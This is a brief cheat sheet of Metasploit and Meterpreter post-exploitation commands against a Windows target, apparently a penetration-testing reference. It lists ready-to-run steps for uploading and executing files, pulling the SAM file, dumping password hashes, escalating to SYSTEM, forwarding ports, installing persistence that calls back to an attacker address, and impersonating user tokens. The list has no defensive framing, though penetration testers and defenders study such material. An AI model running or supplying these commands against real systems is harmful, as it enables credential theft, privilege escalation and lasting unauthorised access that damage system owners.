Useful commands with Meterpreter
Meterpreter upload file to Windows target: meterpreter> upload file c:\windows
Meterpreter download file from Windows target: meterpreter> download c:\windows\repair\sam /tmp
Meterpreter run .exe on target (handy for executing uploaded exploits): meterpreter> execute -f c:\windows\temp\exploit.exe
Creates new channel with cmd shell: meterpreter> execute -f cmd -c
Meterpreter show processes: meterpreter> ps
Meterpreter get shell on the target: meterpreter> shell
Meterpreter attempts privilege escalation on the target: meterpreter> getsystem
Meterpreter attempts to dump the hashes on the target:
meterpreter> hashdump
meterpreter> credcollect
Meterpreter create port forward to target machine: meterpreter> portfwd add -l 3389 -p 3389 -r $IP
Meterpreter delete port forward: meterpreter> portfwd delete -l 3389 -p 3389 -r $IP
Search excel files on target machine: meterpreter> search -f *.xlsx
Get user id: meterpreter> getuid
Check whether the target architecture matches the Meterpreter architecture; if not, migrate to an x64 process: meterpreter> sysinfo
Identify other machines that the supplied domain user has administrative access to: msf> run post/windows/gather/local_admin_search_enum
Connect to a remote host and port: msf> connect $TARGET $PORT
Same, using SSL: msf> connect -s $TARGET $PORT
Starts ruby shell: msf> irb
Integrations with other tools:
msf> load pcap, wmap, nessus
msf> db_hosts
msf> db_vulns
msf> db_exploited
Meterpreter persistence mode: meterpreter> run persistence -U -i 5 -p 443 -r $IP
Impersonate any user:
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\user
meterpreter> drop_token